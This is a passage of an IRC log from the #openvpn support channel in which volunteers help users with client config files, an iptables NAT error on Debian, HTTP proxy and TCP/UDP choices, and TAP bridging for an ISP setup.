_DomY-Dom> pekster: so what would the content of the config file have to look like ? ok so I don't need the 5BBBB ? 21:59 < pekster> !howto 21:59 <@vpnHelper> "howto" is (#1) OpenVPN comes with a great howto, http://openvpn.net/howto PLEASE READ IT! or (#2) http://www.secure-computing.net/openvpn/howto.php for a mirror 21:59 < pekster> There are very verbose samples online too 22:00 < pekster> The manpage will also tell you more about every option 22:00 < pekster> Maybe there's some way to interact with Viscocity through a command-interface, but I don't have a mac or much experience with it; I've used Tunnelblick, but that was a couple years ago 22:02 < _DomY-Dom> pekster: Yeah, but I'm not sure what this "tmpXXXXX.conf" file is meant to do. Could you indicate me on the page which one it refers to ? And also the section about what comes after 127.0.0.1 after --management ? Because, honestly, I think after doing that, I've figured it out since whenever this process is listed in htop, if I kill it, it disconnects the VPN. 22:02 < pekster> _DomY-Dom: It's just the config file. Call it my.conf. Or even cute.jpg for all openvpn cares 22:02 < _DomY-Dom> pekster: which means that technically if I can "run it" it connects it 22:02 < pekster> You need to read the howto, because all of this is explained there 22:03 < _DomY-Dom> pekster: yeah but I don't know in the howto which .conf it refers to, there are dozens of .conf for loads of different things 22:03 < pekster> *You* create the config 22:03 < pekster> It's just a text file 22:03 < _DomY-Dom> pekster: which says what though ? 22:03 < pekster> OpenVPN directives to do what you want 22:04 < pekster> Which is, in fact, explained in the howto 22:04 < _DomY-Dom> pekster: does it have to have any content, or can I just call it tmpXXXXX.conf 22:04 < pekster> Why don't you read the howto and see what it says on that point? 22:04 < _DomY-Dom> pekster: which section, I'm already getting lost in the hotwo ? 22:05 < pekster> Then perhaps configuring OpenVPN isn't for you. There's an entire section dedicated to the configuration files 22:06 < _DomY-Dom> pekster: http://www.secure-computing.net/openvpn/howto.php#config I guess then.. 22:06 <@vpnHelper> Title: SCN: OpenVPN IRC Channel Policy (at www.secure-computing.net) 22:06 < pekster> !howto 22:06 <@vpnHelper> "howto" is (#1) OpenVPN comes with a great howto, http://openvpn.net/howto PLEASE READ IT! or (#2) http://www.secure-computing.net/openvpn/howto.php for a mirror 22:07 < pekster> *THAT* howto 22:07 < pekster> Ah, or that mirror, yes 22:08 < pekster> People put a lot of time into creating it. Those of us who volunteer here don't like answers 2-dozen questions that are expalined in the official documentation; read it, then read it again, and then ask if you're still confused 22:10 < `nand`> with ‘--cipher none’ do you still need a valid key/certificate to connect? 22:10 < _DomY-Dom> pekster: the thing is, those are for linux & BSD. I'm confused about which .conf file we're referring to exactly 22:11 < Valcorb> pekster: i saw the howto but I still don't get it, I have enabled push "redirect-gateway def1" in my server config file and made sure ipv4 forwarding in systcl.conf is on, but still i'm not able to use the internet when im connected to the openvpn server 22:13 < _DomY-Dom> pekster: Also, I can't view the current .conf generated by OpenVPN in /Library/ViscosityHelperTools/ActiveConnections/ how come ? If I could I would know what to include in the one I make. 22:13 < _DomY-Dom> pekster: As in, I can't cat it or find it when I browse to that dir 22:14 < pekster> Valcorb: Where did you get stuck on the flowchart? 22:14 < Valcorb> nowhere, i did everything as they asked 22:14 < Valcorb> oh 22:14 < Valcorb> hmm 22:14 < _DomY-Dom> pekster: have read the wiki -- could you please give me a tip here please though ? 22:15 < Valcorb> iptables gives an error 22:15 < Valcorb> iptables: No chain/target/match by that name. 22:15 < pekster> _DomY-Dom: Find the config file it's generating, or just build your own based on your server's settings 22:16 < pekster> How did you create your server config anyway if you don't have any idea how your system was set up? 22:17 < pekster> Valcorb: Doing what? 22:17 < Valcorb> iptables -t nat -A POSTROUTING -s 10.8.0.0/24 -o eth0 -j MASQUERADE 22:17 < _DomY-Dom> pekster: That's the point, I can't find the one it's generating because it isn't in the directory it says it is. I didn't make my own server config, it's a VPN I'm using which already has all the certificates etc I'm just trying to figure out how to connect to it through the command line and I can disconnect by killing that process in htop but can't connect due to not knowing what to do for config files etc 22:18 < pekster> Valcorb: You don't have the nat table or MASQUERADE target then. modprobe them (if your kernel has them but didn't autoload it) or build the kernel modules if you didn't put them in. What distro? Or is this a VPS you don't control (in which case you need to have the owner fix it) 22:18 < Valcorb> I do control it 22:18 < Valcorb> its Debian 22:19 < pekster> Oh, then you're missing nat or MASQUERADE support... 22:19 < pekster> somehow 22:19 < pekster> What do you get if you do 'iptables -j MASQUERADE -h' ? 22:20 < Valcorb> lemme pastebin it 22:21 < Valcorb> http://pastebin.com/eWHj90sM 22:21 < pekster> _DomY-Dom: You need to know the server settings if you're connecting to a remote server. If it's generic-ish, just use the official sample configs and drop in your keys and remote server details and you're done. But your client settings *must* match the server's for things like encryption and tun/tap settings. See also: 22:21 < pekster> !both 22:21 <@vpnHelper> "both" is If you do not control both ends of the link (server and client) then there is not much we can do to help you. Please talk to your network admin instead. 22:21 < pekster> !provider 22:21 <@vpnHelper> "provider" is (#1) We are not your provider's free tech support. We support the free open source app OpenVPN, not your provider. Just because they run openvpn does not mean we are their support team. or (#2) Please contact their support team. 22:22 < _DomY-Dom> pekster: Any idea how I can find the config file its generating if it's not in the dir it's says it's getting it from (that is --config/Library/ActiveConnections/tmpAAAAAA.conf), the tmpAAAAA.conf isn't there. I know but how do I know the servers settings, I don't get the howto as to how to write this config file. I have the server's ca.crt and ta.key.) 22:22 < pekster> Valcorb: and 'iptables -t nat -nvL' ? 22:22 < Valcorb> http://pastebin.com/PPAnDixt 22:23 < pekster> _DomY-Dom: For the last time, use the sample config file and add in details you need based on the settings you apparently already know 22:24 < _DomY-Dom> pekster: I'm really sorry if I'm slow to understand. Where is the sample.conf ? 22:24 < pekster> hint: the sample config files are in the howto that you obvoiusly didn't read 22:24 < pekster> I'm done helping if you can't be bothered to read the documentation links I send you 22:25 < _DomY-Dom> pekster: this http://openvpn.net/index.php/open-source/documentation/howto.html#client ? 22:25 <@vpnHelper> Title: HOWTO (at openvpn.net) 22:26 < pekster> Valcorb: You sure you didn't mis a spelling on any of that? Your kernel has loaded the support for both the nat table and MASQUERADE targets based on those outputs 22:26 < Valcorb> Yeah I double-checked everything 22:26 < Valcorb> its very weird 22:27 < pekster> Oh, the POSTROUTING has an entry too, but it lacks a target... 22:27 < pekster> Did you upgrade the kernel or something recently and forget to reboot? 22:27 < Valcorb> hmm 22:27 < pekster> Could be modules that don't match up with the running kernel 22:27 < Valcorb> lets try to reboot 22:27 < Valcorb> yea 22:27 < Valcorb> ok rebooting 22:28 < _DomY-Dom> pekster: What if I don't have the server.conf because it isn't my VPN server ? 22:29 < Valcorb> okay i rebooted pekster, want me to re-do those commands? 22:29 < pekster> Then you don't get to know what options they used. If they used non-default encryption, for instance, you'd need to match that up to your client config, or any one of a dozen other options that need to match. You might "assume" they're using a pretty vanilla configuration if your GUI crap just worked 22:30 < pekster> I'm not your VPN provider's support team. I have zero clue how they're configured to work 22:30 < pekster> Valcorb: Any part of the server-side OS stuff that you ddin't make permenant you need to set up again 22:30 < Valcorb> I made everything permanent I believe 22:30 < Valcorb> As I knew it sometimes has to reboot 22:30 < pekster> ie: IP forwarding, NAT, and allowing the traffic through your firewall's filter/FORWARD chain 22:31 < Valcorb> IP forwarding should be permanent 22:31 < Valcorb> !nat 22:31 <@vpnHelper> "nat" is (#1) http://openvpn.net/howto.html#redirect for an explanation of NAT as it applies to openvpn or (#2) http://www.secure-computing.net/wiki/index.php/OpenVPN/FAQ#Traffic_forwarding_doesn.27t_work_when_using_client_specific_access_rules or (#3) dont forget to turn on ip forwarding or (#4) please choose between !linnat !winnat and !fbsdnat for specific howto 22:31 < _DomY-Dom> pekster: All I've got are .ovpn files, a ca.crt and a ta.key 22:31 < Valcorb> _DomY-Dom: .ovpn is your config file 22:31 < _DomY-Dom> pekster: an .ovpn file * 22:31 < Valcorb> you can find samples in 22:32 < Valcorb> C:/Program Files/OpenVPN/config-samples 22:32 < Valcorb> C:/Program Files/OpenVPN/sample-config 22:32 < Valcorb> * 22:32 < pekster> He's on a mac, but yes, samples are also on the page I linked about 3 times now 22:32 < Valcorb> oh 22:32 < pekster> And you apparently also managed to completely miss the howto on config files. The part that reads "Note that on Linux, BSD, or unix-like OSes, the sample configuration files are named server.conf and client.conf. On Windows they are named server.ovpn and client.ovpn." 22:33 < _DomY-Dom> Well that's easy then.. --config/path/to/file.ovpn in this command http://pastebin.com/raw.php?i=iRJyVgiW rather than /Library/ViscosityHelperTools/ActiveConnections/tmpAAAAA.conf ? 22:33 < Valcorb> damn, after reboot it still gives the same error 22:33 < _DomY-Dom> pekster: I'm using Mac though, didn't pay attention to the "Windows" section 22:33 < pekster> Valcorb: Can I see 'iptables-save' ? 22:33 < Valcorb> iptables -t nat -A POSTROUTING -s 10.8.0.0/24 -o eth0 -j MASQUERADE --> no chain/target/match by that name 22:33 < Valcorb> sure 22:33 < _DomY-Dom> Valcorb: check my last question you may know the answer 22:34 < pekster> Hint: Mac is a "Unix-like" system 22:34 < Valcorb> http://pastebin.com/V2z8nCD7 22:34 < _DomY-Dom> pekster: Which is why it makes no sense that the .conf I was talking about is the same as the .ovpn thing I can connect to ! 22:34 < pekster> But your config can be called whatever 22:34 < pekster> I believe I said earlier you can call it cute.jpg if you'd like 22:34 < pekster> That doesn't make it a cute photograph. It's a text file 22:35 < Valcorb> no 22:35 < Valcorb> you have to 22:35 < Valcorb> make sure 22:35 < Valcorb> that 22:35 < Valcorb> your file is called .ovpn at the end 22:35 < Valcorb> or .conf, I don't know about Mac, check the dosx 22:35 < Valcorb> *docs 22:35 < Valcorb> btw, pekster, here it is: http://pastebin.com/V2z8nCD7 22:35 < _DomY-Dom> pekster: no because then it gives me this error http://pastebin.com/raw.php?i=95DY70Qj 22:35 < _DomY-Dom> pekster: when I try and execute the bashscript 22:36 < _DomY-Dom> pekster: actually wait, maybe because I'm still connected to it. Lemme log off and telll you if you if it makes a difference. brb 22:36 < pekster> Valcorb: weird. What's the output of 'zgrep CONFIG_NF_NAT /proc/config.gz' ? 22:36 -!- _DomY-Dom [~hussainah@94.23.145.51] has quit [Quit: leaving] 22:37 < Valcorb> gzip: /proc/config.gz: No such file or directory 22:37 < Valcorb> lol 22:37 < pekster> Lousy debian... 22:37 < Valcorb> ikr 22:37 < pekster> wtf would you hide the options you built a kernel with? :( 22:37 < pekster> Well, the output from iptables suggests they're present, but your error suggests otherwise 22:38 < Valcorb> yeah 22:38 -!- _DomY-Dom [~hussainah@94.23.145.51] has joined #openvpn 22:38 < Valcorb> its weird 22:38 < pekster> how about 'lsmod | grep nat' ? 22:38 < Valcorb> nothing 22:38 < Valcorb> lol 22:39 < pekster> Must be compiled into the kernel then (by process of elimination) 22:39 < Valcorb> hmm 22:39 < pekster> Any SELinux involved? 22:40 < Valcorb> don't think so 22:40 < pekster> And, as root, 'iptables -t nat -A POSTROUTING -s 10.8.0.0 -o eth0 -j MASQUERADE' still throws that error? 22:40 < pekster> Erm, /24 on that -s network 22:41 < Valcorb> yup 22:41 < Valcorb> still same error 22:42 < pekster> Try SNAT instead using your server's IP: 'iptables -t nat -A POSTROUTING -s 10.8.0.0/24 0o eth0 -j SNAT --to-source $ip_of_eth0' 22:42 < Valcorb> Bad argument `0o' 22:42 < Valcorb> just 0, right? :P 22:42 < pekster> -o 22:42 < pekster> (typo) 22:42 < Valcorb> o 22:42 < pekster> -o eth0 22:43 < pekster> We're just changing the target 22:43 < pekster> Not thte match 22:43 < Valcorb> iptables v1.4.8: option `--to-source' requires an argument 22:43 < pekster> Right, replace that with your actual IP... 22:43 < `nand`> Can I use a HTTP(S) proxy in UDP mode? 22:43 < Valcorb> oh 22:43 < Valcorb> wow 22:43 < Valcorb> im an idiot 22:43 < Valcorb> lol 22:43 < `nand`> Or would I have to switch to tcp mode for that 22:43 < Valcorb> okay done pekster 22:44 < pekster> `nand`: You mean across the VPN? You can said whatever traffic you want across the VPN tunnel, but you can't connect to an openvpn server as a client through an https proxy becuase openvpn speaks the openvpn protocol, not https 22:44 < Valcorb> wait, what IP should it be? 10.8.0.0? 22:44 < pekster> Nope 22:44 < pekster> eth0's IP 22:44 < Valcorb> aha 22:44 < `nand`> pekster: that's incorrect 22:44 < `nand`> pekster: OpenVPN supports HTTP proxies 22:45 < `nand`> see option --http-proxy 22:45 -!- _DomY-Dom [~hussainah@94.23.145.51] has quit [Ping timeout: 240 seconds] 22:45 < pekster> `nand`: Oh, I guess I'm mistaken. Then yea, you'd need tcp for that 22:45 < Valcorb> well i'll check it out tomorrow 22:45 < Valcorb> almost 6 am here 22:45 < `nand`> ah, okay. I need to run two servers to support both TCP and UDP connections, right? 22:45 < pekster> Yup 22:46 < Valcorb> thanks for the help pekster! 22:46 < pekster> With separate network ranges, although you can have the local firewall route between them 22:46 < `nand`> is there some fundamental reason for that or would it be possible to support connecting via both TCP and UDP? 22:46 < pekster> Valcorb: Yea, good luck. There's something screwey with your kernel support. Maybe try 'apt-get update && apt-get dist-upgrade' 22:46 < Valcorb> could try dist-upgrade 22:46 < Valcorb> i did apt-get update a few hours ago 22:47 < pekster> update just updates your list of packages 22:47 < `nand`> I need to connect through a HTTP proxy from one peer, but using TCP instead of UDP imposes a large hit on throughput 22:47 < Valcorb> yea 22:47 < pekster> Not actually upgrades your OS 22:47 < Valcorb> nah 22:47 < Valcorb> dist-upgrade: 22:47 < Valcorb> 0 upgraded, 0 newly installed, 0 to remove and 0 not upgraded. 22:47 < pekster> `nand`: Right. UDP is preferred, but an http proxy only transports tcp data 22:47 < Valcorb> anyways, good night! 22:48 < pekster> Same problem you have with tor, or an ssh SOCKS proxy, etc 22:48 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has quit [] 22:48 < `nand`> pekster: could I set some sort of silly mechanism up to listen on the TCP port and forward all traffic to the UDP port instead? 22:48 < pekster> Nope 22:49 < pekster> Just run 2 instances and route between them if you want clients to reach one-another on different instances 22:51 < `nand`> Hmm this seems relevant http://www.cs.columbia.edu/~lennox/udptunnel/ 22:51 <@vpnHelper> Title: UDPTunnel 1.1 (at www.cs.columbia.edu) 22:56 < pekster> It won't give you any better performance, and in fact would incur slightly more packet overhead to add yet another layer of encapsulation, plus make the setup more complicated. If you want that badly to connect to a single openvpn instance, sure, check it out, but IMO it's not woth the added complexity 22:57 < pekster> You can basically just copy your UDP config on the server, set it to tcp-server for the protocol, give it a different netnwnork range (eg, 10.8.0.0/24 -> 10.8.1.0/24) and you're done 22:58 < `nand`> pekster: I don't care about performance on the machine that needs the HTTP proxy 22:59 < pekster> I just don't see why you're trying so hard to avoid running a 2nd instance 23:02 < pekster> Quite a list of limitations on that udptunnel project too. Not sure what you get for all your trouble in the end 23:03 < pekster> Circa 2001 too; hopefully it still builds ;) --- Day changed Wed Feb 13 2013 00:30 -!- jthunder [~jthunder@174.3.126.51] has quit [Quit: jthunder] 00:50 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn 00:50 -!- mode/#openvpn [+o krzee] by ChanServ 01:03 -!- b1rkh0ff [~b1rkh0ff@178.77.19.125] has quit [Read error: Operation timed out] 01:18 -!- jY [~jy@photoblog.com] has quit [Ping timeout: 276 seconds] 01:20 -!- b1rkh0ff [~b1rkh0ff@178.77.22.0] has joined #openvpn 01:39 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Ping timeout: 252 seconds] 02:16 -!- Wintereise [~reise@unaffiliated/wintereise] has joined #openvpn 02:19 -!- bauruine [~stefan@91.236.116.112] has quit [Ping timeout: 248 seconds] 02:33 -!- knobo [~bohmer@81.175.44.217] has joined #openvpn 02:52 -!- p3rror [~mezgani@2001:0:53aa:64c:2c98:2140:d607:4551] has joined #openvpn 03:08 -!- kobolduk [~kobolduk@office.prolocation.net] has joined #openvpn 03:09 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn 03:10 -!- hg_5_ [~chatzilla@91.234.245.245] has joined #openvpn 03:17 -!- zz_AsadH is now known as AsadH 03:24 -!- Saviq_ [~Saviq@178.182.120.58.nat.umts.dynamic.t-mobile.pl] has joined #openvpn 03:24 -!- Saviq_ [~Saviq@178.182.120.58.nat.umts.dynamic.t-mobile.pl] has quit [Read error: Connection reset by peer] 03:33 -!- bauruine [~stefan@91.236.116.112] has joined #openvpn 03:34 -!- kyrix [~ashley@85-126-76-82.work.xdsl-line.inode.at] has joined #openvpn 03:40 -!- hg_5_ [~chatzilla@91.234.245.245] has quit [Ping timeout: 256 seconds] 03:41 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Ping timeout: 256 seconds] 03:47 -!- gffa [~unknown@unaffiliated/gffa] has joined #openvpn 03:52 -!- goldkatze [~nobody@unaffiliated/goldkatze] has joined #openvpn 03:55 -!- goldkatze [~nobody@unaffiliated/goldkatze] has quit [Client Quit] 03:59 -!- dazo_afk is now known as dazo 04:26 -!- kobolduk [~kobolduk@office.prolocation.net] has quit [Ping timeout: 272 seconds] 04:27 -!- kobolduk [~kobolduk@office.prolocation.net] has joined #openvpn 04:36 -!- Saviq_ [~Saviq@89-70-82-159.dynamic.chello.pl] has joined #openvpn 04:37 -!- Saviq_ [~Saviq@89-70-82-159.dynamic.chello.pl] has quit [Client Quit] 04:57 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn 04:58 -!- hg_5_ [~chatzilla@91.234.245.245] has joined #openvpn 05:02 -!- loompek [~noname@unaffiliated/loompek] has joined #openvpn 05:02 < loompek> mornin, smee again 05:10 -!- hg_5_ [~chatzilla@91.234.245.245] has quit [Ping timeout: 272 seconds] 05:10 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Ping timeout: 272 seconds] 05:44 -!- bauruine [~stefan@91.236.116.112] has quit [Ping timeout: 252 seconds] 05:47 -!- syzzer [~steffan@50709F7C.static.ziggozakelijk.nl] has quit [Quit: leaving] 06:00 < loompek> so i have a specific question regarding tap mode on server... i'd like to bridge different users (clients) with different bridges on one server instance 06:00 < loompek> e.g. user1001 would be bridged to bridge1001, user1002 to bridge1002 etc... 06:01 < loompek> user's tap devices are probably dynamic (tun0 is provided to the first user who connects to the system, tun1 to the second, tun2 to third, etc...) 06:02 < loompek> the bridge devices are already up 06:02 < loompek> and are already bridged to different nics 06:02 < loompek> would it be possible to do this in one server instacne 06:02 < loompek> s/instacne/instance/ 06:03 < loompek> or will i have to set up multiple server instances.. one for every user.. which wouldn't be okay... 06:03 < loompek> as every instance would use different port 06:05 <@dazo> loompek: sounds like an impossible task ... you can't have separate tap devices per user without separate openvpn instances 06:05 <@dazo> loompek: but more importantly ... why do you want to bridge? Just to have access control for each user? 06:06 < loompek> no, because this server would be a virtual link aggregator 06:06 <@dazo> Not sure if I understand the use case at all 06:06 < loompek> it would be an isp solution 06:07 < loompek> every user has it's own vlan 06:07 < loompek> dhcp server is hidden behind edge router 06:07 < pekster> But, you already get that with openvpn already 06:07 <@dazo> I see 06:08 < pekster> Just don't route between clients and OpenVPN in tun mode is effectively puts every client in their own "vlan" so to speak at an L3 level 06:08 < loompek> this system would be connected in front of the edge router and provide remote access to each user 06:08 < loompek> like i said 06:08 <@dazo> well, TAP and bridging most likely isn't the solution here .... that requires separate processes 06:08 < loompek> tun is unacceptable 06:08 < loompek> tap is the only way to go 06:09 < loompek> so.. each and every user should have it's own server instance 06:09 <@dazo> because openvpn clients may have broadcast traffic you need to transfer to the customer vlan's behind the server? 06:09 < loompek> i don't mind the broadcast traffic 06:09 < loompek> as it would provide l2 to each user... 06:09 < loompek> and everything should work... 06:10 < loompek> from ARP to DHCP traffic 06:10 <@dazo> yeah, that's what I meant ... your service requires to transport L2 traffic across VPN to VLAN 06:10 < loompek> indeed 06:11 <@dazo> As you are in an ISP situation here, tap + bridging are the only solution here .... and to be honest, I'm not sure OpenVPN is the right solution in this setup 06:12 <@dazo> as it won't scale well when you have new customers .... new customer => new VLAN => new OpenVPN server config => bridge VLAN+tap 06:12 <@dazo> however! separate openvpn servers will make the general performance far better than a shared openvpn server ... as each server have only one client to care for 06:13 < havoc> loompek: how many projected customers? 06:13 < pekster> Context switching will still slaughter throughput though 06:13 < havoc> that's a relevant factor 06:14 <@dazo> pekster: actually, context switching (I presume you mean kernel/user-space switches) aren't the biggest trouble with openvpn ... the general efficiency in the tun.ko driver is actually worse 06:15 <@dazo> (the tun.ko driver handles traffic above 1-2Gbps poorly in its current shape) 06:15 < havoc> I thought TUN was better than TAP, performance-wise? 06:15 < havoc> or is that only an issue of L2 v. L3? 06:15 < pekster> Oh, interesting to note. I guess there are multiple bottlenecks in that sense then 06:15 <@dazo> havoc: performance wise, you have a higher overhead with TAP than TUN, due to L2 vs L3 06:15 < havoc> right 06:16 < havoc> but are you also saying that level for level, TAP is better than TUN? 06:16 < havoc> i.e. L3+ 06:16 <@dazo> pekster: one hard nut in the tun.ko vs other NICs ... is hardware checksum calculations on TCP packets, which is impossible in a software-only driver 06:16 < pekster> Ah, sure. No TCO possible 06:17 <@dazo> havoc: TUN/L3 gives best performance, due to no ARP broadcasts and such .... TUN/L3 also only transmits traffic destined to that particular client 06:17 <@dazo> havoc: TAP/L2 will always send out broadcast traffic, both on L2 and L3 layer 06:18 < havoc> right, so not an easy/accurate comparison 06:18 <@dazo> havoc: and in addition, you have the Ethernet frames which are transmitted in TAP/L2 ... while TUN/L3 only transport IP packets 06:18 < havoc> right 06:18 < havoc> also, sounds like you came across a situation where bridging is recommended ;) 06:19 <@ecrist> there are certainly situations where bridging is recommended 06:19 <@ecrist> they're rare, though 06:19 < havoc> yeah 06:19 < havoc> I've had a few in the past 06:19 < havoc> been migrating stuff from TAP to TUN too, it's just slooooow :( 06:19 <@dazo> pekster: I know that there are some discussion about making the tun driver multi-threaded as well ... having more tx/rx queues internally as well, so the application can shuffle more data to/from the tun via more "pipes" in the application .... that's the other big bottleneck 06:20 <@dazo> pekster: and the driver to sort out that is KVM/Qemu .... which uses tun.ko for para-virtualised networks 06:20 <@ecrist> the most compelling reason to switch from tap to tun for me is mobile device support 06:20 <@ecrist> there's not tap adapter for iOS/Android 06:21 < havoc> that's a definite perk 06:21 < havoc> does the new android ovpn require root access still? 06:22 <@dazo> havoc: "OpenVPN for Android" and "OpenVPN Connect" uses the Android VPN API ... so no rooting needed 06:22 <@dazo> but requires ICS or JB 06:22 < havoc> I don't know what those are 06:22 * havoc googles 06:22 <@ecrist> Android 4 06:22 < havoc> oh, jelly bean 06:23 < havoc> bah, mine's a bit older I think 06:23 < havoc> but still good to know 06:25 -!- bauruine [~stefan@91.236.116.112] has joined #openvpn 06:29 < sw0rdfish> hey guys, can my vpn provider restrict me to ONLY use a TAP device on my end? 06:29 <@ecrist> yes 06:30 <@dazo> sw0rdfish: if you VPN provider uses OpenVPN, you can only use whatever the VPN provider offers you .... you need to use the same on both sides 06:37 < loompek> havoc hard to tell... i preconfigured vlans 1001 do 1099 :) 06:38 < havoc> ah 06:38 < loompek> but i guess i'll have to check for a different approach 06:38 < havoc> I'm just wondering why the bridging 06:39 < loompek> because it would be easy to integrate to current core network 06:40 < havoc> still need TAP for the L2 stuff for the customers, but I'd think you could do it w/ TAP and no client-to-client 06:40 < havoc> then do the rest w/ routing on the vpn host 06:40 <@dazo> havoc: you won't be able to route broadcast traffic from the customer dedicated VLANs with that approach 06:41 < havoc> but I understand that the situation is more complicated than what I'm aware of 06:41 < havoc> dazo: ah, so bcast is required? 06:41 <@dazo> or L2 traffic, in general 06:41 <@dazo> this really is one of the very rare cases where tap+bridging is the solution 06:42 < havoc> sounds like it 06:45 < sw0rdfish> dazo woe 06:45 < sw0rdfish> wow* 06:45 < sw0rdfish> ok I see. 06:46 < sw0rdfish> thanks 06:46 < sw0rdfish> well god damn it I need to make iptables work for eth0 -> tap0 06:47 < sw0rdfish> maybe I'm gonna try making a backup of the config file and use rules only for tap0 06:50 < loompek> never mind... i guess i'll deploy routeros on x86 platform.. that openvpn implementation allows me on doing just what i'd like 06:52 < loompek> http://wiki.mikrotik.com/wiki/OpenVPN#OpenVPN_server_Instance 06:52 <@vpnHelper> Title: OpenVPN - MikroTik Wiki (at wiki.mikrotik.com) 06:55 -!- knobo [~bohmer@81.175.44.217] has quit [Read error: Connection reset by peer] 06:55 < pekster> No idea what that text is trying to say. None of the code is openvpn or apaprent to any OS I'm familiar with. I've used openvpn in both routed and bridged modes on the OpenWRT platform on MIPS before with results one would expect for the platform 07:01 -!- nirvannah [~nirv@unaffiliated/nirvana] has joined #openvpn 07:02 < nirvannah> hello, are there any way that to hide my torrent activity when i'm using vpn? because the vpn wont allow me to torrent 07:03 <@ecrist> you mean your vpn service provider? 07:03 -!- master_of_master [~master_of@p57B53160.dip.t-dialin.net] has quit [Ping timeout: 252 seconds] 07:03 < nirvannah> yes 07:03 <@ecrist> not really the right channel 07:03 < nirvannah> thanks but may you lead me to the right channel 07:04 <@ecrist> ask in a torrent channel maybe? 07:04 <@ecrist> we don't really deal with helping people hide traffic 07:05 -!- master_of_master [~master_of@p57B5322D.dip.t-dialin.net] has joined #openvpn 07:05 < nirvannah> sorry but there's no torrent channels in here, maybe you could help me for this one time, wont ask again, please 07:06 <@ecrist> no 07:06 -!- AsadH is now known as zz_AsadH 07:09 -!- zz_AsadH is now known as AsadH 07:16 < nirvannah> and also, do you need to disable netbios to use openvpn? 07:17 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn 07:20 < pekster> Nope. NBNS may have DNS implications to higher-level protocols, but OpenVPN itself doesn't care 07:23 -!- adolfomaltez [~taro@190.62.247.125] has quit [Remote host closed the connection] 07:23 < nirvannah> i edit the .ovpn from my vpn provider, i changed the protocol udp to tcp, why does it still work? 07:25 < pekster> Clearly they support both 07:25 < pekster> !provider 07:25 <@vpnHelper> "provider" is (#1) We are not your provider's free tech support. We support the free open source app OpenVPN, not your provider. Just because they run openvpn does not mean we are their support team. or (#2) Please contact their support team. 07:25 < pekster> I have zero clue how $insert_provider does business or operates 07:38 -!- nirvannah [~nirv@unaffiliated/nirvana] has quit [Quit: The Man Who Raped The World] 07:39 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has quit [] 07:40 -!- Cybertinus [~Cybertinu@2001:828:405:30:83:96:177:42] has joined #openvpn 07:41 -!- Cybert1nus [~Cybertinu@2001:828:405:30:83:96:177:42] has quit [Ping timeout: 264 seconds] 07:42 -!- pekster [~rewt@openvpn/community/support/pekster] has quit [Ping timeout: 264 seconds] 07:44 -!- pekster [~rewt@openvpn/community/support/pekster] has joined #openvpn 07:52 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn 07:55 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has quit [Client Quit] 07:59 -!- rob0_ is now known as rob0 08:06 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn 08:14 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has quit [] 08:19 -!- nickanderson_afk is now known as nickanderson 08:31 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn 08:39 -!- Pei [pei@2600:3c00::f03c:91ff:feae:5e2d] has left #openvpn [] 08:42 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has quit [] 08:57 -!- jthunder [~jthunder@174.3.126.51] has joined #openvpn 09:00 -!- jthunder [~jthunder@174.3.126.51] has quit [Client Quit] 09:03 -!- idlecool [~i@sd.gs] has quit [Ping timeout: 264 seconds] 09:04 -!- idlecool [~i@sd.gs] has joined #openvpn 09:08 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn 09:10 -!- Eagleman [~Eagleman@vpn.eagleman.net] has joined #openvpn 09:11 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn 09:22 -!- p3rror [~mezgani@2001:0:53aa:64c:2c98:2140:d607:4551] has quit [Ping timeout: 245 seconds] 09:34 -!- mikkel [~mikkel@80-71-132-15.u.parknet.dk] has joined #openvpn 09:34 -!- p3rror [~mezgani@2001:0:53aa:64c:427:2140:d606:7bec] has joined #openvpn 09:36 -!- KaiForce [~chatzilla@adsl-70-228-90-247.dsl.akrnoh.ameritech.net] has quit [Quit: ChatZilla 0.9.90 [Firefox 18.0.2/20130201065344]] 09:57 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Ping timeout: 252 seconds] 09:58 -!- p3rror [~mezgani@2001:0:53aa:64c:427:2140:d606:7bec] has quit [Ping timeout: 245 seconds] 10:01 -!- ade_b [~Ade@host-78-65-176-9.homerun.telia.com] has joined #openvpn 10:01 -!- ade_b [~Ade@host-78-65-176-9.homerun.telia.com] has quit [Changing host] 10:01 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn 10:04 -!- MeanderingCode [~Meanderin@71-213-164-111.albq.qwest.net] has joined #openvpn 10:12 -!- jthunder [~jthunder@184.151.222.94] has joined #openvpn 10:12 -!- p3rror [~mezgani@2001:0:53aa:64c:14c4:2140:d606:f965] has joined #openvpn 10:15 -!- MeanderingCode [~Meanderin@71-213-164-111.albq.qwest.net] has quit [Remote host closed the connection] 10:16 -!- bauruine [~stefan@91.236.116.112] has quit [Ping timeout: 252 seconds] 10:16 -!- Sickness\ [~stront@wolfenstein.enemyterritory.org] has joined #openvpn 10:16 -!- Sickness\ [~stront@wolfenstein.enemyterritory.org] has quit [Changing host] 10:16 -!- Sickness\ [~stront@unaffiliated/s-work] has joined #openvpn 10:18 -!- p3rror [~mezgani@2001:0:53aa:64c:14c4:2140:d606:f965] has quit [Ping timeout: 245 seconds] 10:19 -!- raidz_away is now known as raidz 10:19 -!- ownermint [~owner@72-161-164-75.dyn.centurytel.net] has joined #openvpn 10:19 -!- ownermint [~owner@72-161-164-75.dyn.centurytel.net] has left #openvpn [] 10:26 -!- kobolduk [~kobolduk@office.prolocation.net] has quit [Quit: ["Textual IRC Client: www.textualapp.com"]] 10:28 -!- gladiatr [~sdspence@openvpn/community/support/gladiatr] 